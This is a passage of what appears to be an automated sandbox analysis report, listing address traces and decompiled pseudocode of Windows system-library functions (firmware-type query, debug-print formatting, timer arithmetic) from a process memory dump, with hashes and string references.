0x0178e7e6
0x0178e7eb
0x0178e7ed
0x0178e7f4
0x0178e7fa
0x0178e7ff
0x0178e7ff
0x0178e80a
0x0178e812
0x0178e812
0x0178e5ab
0x0178e5b4
0x0178e5b9
0x0178e5be
0x0178e5c0
0x0178e5c2
0x0178e5c8
0x0178e5c9
0x0178e5cb
0x0178e5cc
0x0178e5d5
0x0178e5e4
0x0178e5f1
0x0178e5f8
0x0178e5f8
0x0178e5d5
0x0178e602
0x0178e616
0x0178e63d
0x0178e644
0x0178e64d
0x0178e652
0x0178e657
0x0178e659
0x0178e65b
0x0178e661
0x0178e662
0x0178e664
0x0178e665
0x0178e66e
0x0178e67d
0x0178e68a
0x0178e691
0x0178e691
0x0178e66e
0x0178e6b0
0x00000000
0x0178e6b6
0x0178e6bd
0x0178e6c7
0x0178e6d7
0x0178e6d9
0x0178e6db
0x0178e6de
0x0178e6e3
0x0178e6f3
0x0178e6fc
0x0178e700
0x0178e700
0x0178e704
0x0178e70a
0x0178e70a
0x0178e713
0x0178e716
0x0178e719
0x0178e720
0x0178e761
0x0178e76b
0x0178e774
0x0178e77a
0x0178e77a
0x0178e78a
0x0178e791
0x0178e799
0x0178e79b
0x0178e79f
0x0178e7aa
0x0178e7c0
0x0178e7ac
0x0178e7b2
0x0178e7b9
0x0178e7b9
0x0178e7c7
0x0178e806
0x00000000
0x0178e7c9
0x0178e7d1
0x0178e7d8
0x00000000
0x0178e7d8
0x00000000
0x00000000
0x0178e722
0x0178e72e
0x0178e748
0x0178e74c
0x0178e754
0x0178e756
0x0178e75c
0x0178e75c
0x00000000
0x0178e75c
0x0178e758
0x0178e758
0x00000000
0x0178e758
0x0178e750
0x00000000
0x00000000
0x0178e752
0x00000000
0x0178e752
0x0178e730
0x0178e735
0x0178e73d
0x0178e73f
0x00000000
0x00000000
0x0178e741
0x0178e741
0x00000000
0x0178e741
0x0178e739
0x00000000
0x00000000
0x0178e73b
0x00000000
0x0178e73b
0x0178e722
0x0178e720
0x0178e6b0
0x0178e618
0x00000000
0x0178e618

Strings

`, xrefs: 0178E5D7
`, xrefs: 0178E670

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: cfe95b695e6698ded5023ebaee778e4102e6a541e9d085d95c018f924bdeb1a1
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 45917E312443429BE725EE29C845B1BFBE6AF84714F14892DF6A5CB280EB74E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 017451BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E017451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x17a05f0);
				E0171D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E016DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E017453CA(0);
						return E0171D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0170F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E016E3690(1, _t117, 0x16a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0170AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L016E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0170AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0174500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01709860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x017451be
0x017451c3
0x017451c8
0x017451cd
0x017451d0
0x017451d3
0x017451d8
0x017451db
0x017451de
0x017451e0
0x017451e3
0x017451e6
0x017451e8
0x01745342
0x01745351
0x01745356
0x0174535a
0x01745360
0x01745363
0x01745366
0x01745369
0x01745369
0x0174536b
0x0174536b
0x01745370
0x017453a3
0x017453a4
0x017453a6
0x017453ab
0x017453ab
0x017453ae
0x017453ae
0x017453b5
0x017453bf
0x017453bf
0x01745375
0x01745396
0x017453a0
0x017453a0
0x00000000
0x01745396
0x01745377
0x01745379
0x0174537f
0x0174538c
0x01745390
0x00000000
0x01745390
0x017451ee
0x017451f1
0x01745301
0x01745310
0x01745315
0x01745318
0x0174531b
0x01745320
0x0174532e
0x01745331
0x00000000
0x01745331
0x01745328
0x01745329
0x00000000
0x01745329
0x017451fa
0x01745235
0x01745236
0x01745239
0x0174523f
0x01745240
0x01745241
0x01745242
0x01745246
0x01745247
0x0174524e
0x01745251
0x01745267
0x01745269
0x0174526e
0x0174527d
0x0174527e
0x01745281
0x01745282
0x01745287
0x01745288
0x0174528a
0x0174528f
0x01745294
0x00000000
0x00000000
0x0174529a
0x0174529c
0x0174529e
0x0174529e
0x017452a4
0x017452b0
0x00000000
0x00000000
0x017452ba
0x017452bc
0x017452bc
0x017452d4
0x017452d9
0x017452dc
0x017452e1
0x00000000
0x00000000
0x017452e7
0x017452f4
0x00000000
0x017452f4
0x01745270
0x00000000
0x01745270
0x017451fc
0x017451fd
0x01745202
0x01745203
0x01745205
0x0174520a
0x0174520f
0x00000000
0x00000000
0x0174521b
0x01745226
0x0174522b
0x0174521d
0x0174521d
0x01745222
0x01745222
0x0174522d
0x00000000

Strings

Legacy, xrefs: 01745226
UEFI, xrefs: 0174521D

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 1e4ad26e210b80e6c60feab19c631368dbe3dc10aba75535c268b0d1b7c7992b
Instruction ID: f323b907af512e45727999f69ae0f54edd306ae395519c60dbfb244344d43c35
Opcode Fuzzy Hash: 1e4ad26e210b80e6c60feab19c631368dbe3dc10aba75535c268b0d1b7c7992b
Instruction Fuzzy Hash: D9515BB1A046199FDB25DFA8C844AAEFBF8BF48704F14406EE649EB291DB719D40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 016CB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E016CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x179f7a8);
				E0171D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0171D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0170D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0170F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0171DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0170B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0170B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0170E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0170A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x016cb171
0x016cb171
0x016cb171
0x016cb171
0x016cb171
0x016cb176
0x016cb17b
0x016cb180
0x016cb186
0x016cb18f
0x016cb198
0x016cb1a4
0x016cb1aa
0x01724802
0x01724802
0x01724805
0x0172480c
0x0172480e
0x016cb1d1
0x016cb1d3
0x016cb1de
0x016cb1de
0x01724817
0x0172481e
0x01724820
0x01724822
0x01724822
0x01724824
0x01724824
0x0172482a
0x00000000
0x00000000
0x01724835
0x0172483a
0x0172483d
0x0172483f
0x01724842
0x01724842
0x01724842
0x01724846
0x0172484c
0x0172484e
0x01724851
0x01724851
0x01724853
0x01724854
0x01724854
0x01724858
0x0172485a
0x0172485a
0x0172485d
0x0172485f
0x01724861
0x01724861
0x01724866
0x0172486b
0x0172486e
0x01724871
0x01724876
0x01724876
0x01724878
0x0172487b
0x01724884
0x01724884
0x00000000
0x0172487d
0x0172487d
0x01724882
0x01724889
0x01724889
0x0172488f
0x01724891
0x017248e0
0x017248e2
0x017248e4
0x017248e4
0x017248e7
0x017248e7
0x017248ed
0x017248f4
0x017248f6
0x01724951
0x01724951
0x01724953
0x01724953
0x01724956
0x01724956
0x01724958
0x01724959
0x01724959
0x0172495d
0x0172495d
0x0172495f
0x0172495f
0x01724965
0x01724969
0x017249ba
0x017249ba
0x017249c1
0x017249c5
0x017249cc
0x017249d4
0x017249d7
0x017249da
0x017249e4
0x017249e5
0x017249f3
0x01724a02
0x00000000
0x01724a02
0x01724972
0x01724974
0x00000000
0x00000000
0x01724976
0x01724979
0x01724982
0x01724983
0x01724984
0x0172498b
0x0172498d
0x01724991
0x01724993
0x01724999
0x0172499d
0x017249a2
0x017249a2
0x017249a2
0x01724999
0x017249ac
0x00000000
0x017249b3
0x017248f8
0x017248fe
0x00000000
0x00000000
0x00000000
0x017248fe
0x01724895
0x0172489c
0x017248ad
0x017248b2
0x017248b5
0x017248b7
0x017248ba
0x017248bc
0x017248c6
0x017248c6
0x017248cb
0x017248d1
0x017248d4
0x017248d8
0x017248d8
0x00000000
0x017248d8
0x017248be
0x017248c0
0x00000000
0x00000000
0x017248c2
0x00000000
0x00000000
0x00000000
0x017248c4
0x00000000
0x01724882
0x0172487b
0x01724904
0x01724906
0x00000000
0x00000000
0x01724908
0x0172490e
0x00000000
0x00000000
0x01724910
0x01724917
0x01724917
0x00000000
0x01724917
0x016cb1ba
0x017247f9
0x017247fc
0x00000000
0x00000000
0x00000000
0x017247fc
0x016cb1c0
0x016cb1c0
0x016cb1c3
0x016cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 017248AD

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 17938cf6b1f3b3afbd5c58680fd6c9ba12834956bfa8fc9a968279cf11c0959e
Instruction ID: 5f8da1698bc27bd0f4a62dd7ad3dafa8b9fb4a8404f2c6a640147903f13c59aa
Opcode Fuzzy Hash: 17938cf6b1f3b3afbd5c58680fd6c9ba12834956bfa8fc9a968279cf11c0959e
Instruction Fuzzy Hash: 7051C271E102698ADB36CF68C845BBEFBB0AF04710F1041ADD89AAB286D7744946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 016EB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E016EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x17bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E016E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01798CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01709E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0170B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0170CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E016E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01798F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0170AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x17b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x17b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x17b8628; // 0x0
							_t116 =  *0x17b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x016eb94c
0x016eb956
0x016eb95c
0x016eb95e
0x016eb964
0x016eb969
0x016eb96d
0x016eb96d
0x016eb970
0x016eb974
0x016eb97a
0x016ebadf
0x016ebadf
0x016ebae2
0x016ebae4
0x016ebae6
0x016ebaf0
0x01732cb8
0x016ebaf6
0x016ebaf6
0x016ebaf6
0x016ebafd
0x016ebb1f
0x016ebb1f
0x016ebaff
0x016ebb00
0x016ebb00
0x016ebb03
0x016ebb03
0x016ebacb
0x016ebacf
0x016ebad0
0x016ebad1
0x016ebadc
0x016ebadc
0x016eb980
0x016eb980
0x016eb988
0x016eb98b
0x016eb98d
0x016eb990
0x016eb993
0x016eb999
0x016eb99b
0x016eb9a1
0x016eb9a5
0x016eb9aa
0x016eb9b0
0x016eb9bb
0x016eb9c0
0x016eb9c3
0x016eb9ca
0x016eb9cc
0x016eb9cf
0x016eb9d3
0x016eb9d7
0x016eba94
0x016eba94
0x016eba98
0x016ebaa3
0x01732ccb
0x016ebaa9
0x016ebaa9
0x016ebaa9
0x016ebab1
0x01732cd5
0x01732cdd
0x01732cdd
0x016ebabb
0x016ebabc
0x016ebac2
0x016ebac3
0x016ebac3
0x016ebac6
0x00000000
0x016eb9dd
0x016eb9dd
0x016eb9e7
0x016eb9e7
0x016eb9ec
0x016eb9ec
0x016eb9f1
0x016eb9f5
0x016eb9fa
0x016eba00
0x016eba0c
0x016eba10
0x016eba10
0x016eba12
0x016eba18
0x00000000
0x00000000
0x016ebb26
0x016ebb26
0x016eba1e
0x016eba1e
0x016eba23
0x016eba25
0x016eba2c
0x016eba30
0x016eba35
0x016eba35
0x016eba41
0x016eba46
0x016eba4c
0x016eba50
0x016eba54
0x016eba6a
0x016eba6e
0x016eba70
0x016eba74
0x016eba78
0x016eba7a
0x016eba7c
0x016eba8e
0x016eba90
0x016eba92
0x016ebb14
0x016ebb14
0x016ebb16
0x016ebb16
0x00000000
0x016eba7c
0x016ebb0a
0x016ebb0d
0x00000000
0x00000000
0x00000000
0x016ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016EB9A5

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 012ad10708fb69da86225c8a68d19635bf4ae1a52cedacca8fe74f210a307fac
Instruction ID: ed01a4051bf998dd94149ff7393a343390e518dfac61c53e1baf83775ae683ac
Opcode Fuzzy Hash: 012ad10708fb69da86225c8a68d19635bf4ae1a52cedacca8fe74f210a307fac
Instruction Fuzzy Hash: 4C515B71609341CFCB21CF2CC8C492AFBE5FB88614F148A6EEA8597355D731E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 016F2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E016F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed char _t247;
				signed int _t251;
				signed int _t253;
				intOrPtr _t255;
				signed int _t258;
				signed int _t265;
				signed int _t268;
				signed int _t276;
				intOrPtr _t282;
				signed int _t284;
				signed int _t286;
				void* _t287;
				void* _t288;
				signed int _t289;
				unsigned int _t292;
				signed int _t296;
				void* _t297;
				signed int _t298;
				signed int _t302;
				intOrPtr _t314;
				signed int _t323;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t331;
				intOrPtr* _t333;
				void* _t334;
				signed int _t335;
				signed int _t337;
				signed int _t340;
				signed int _t341;
				void* _t343;

				_t337 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x17bd360 ^ _t337;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t330 = 0x17bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t292 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
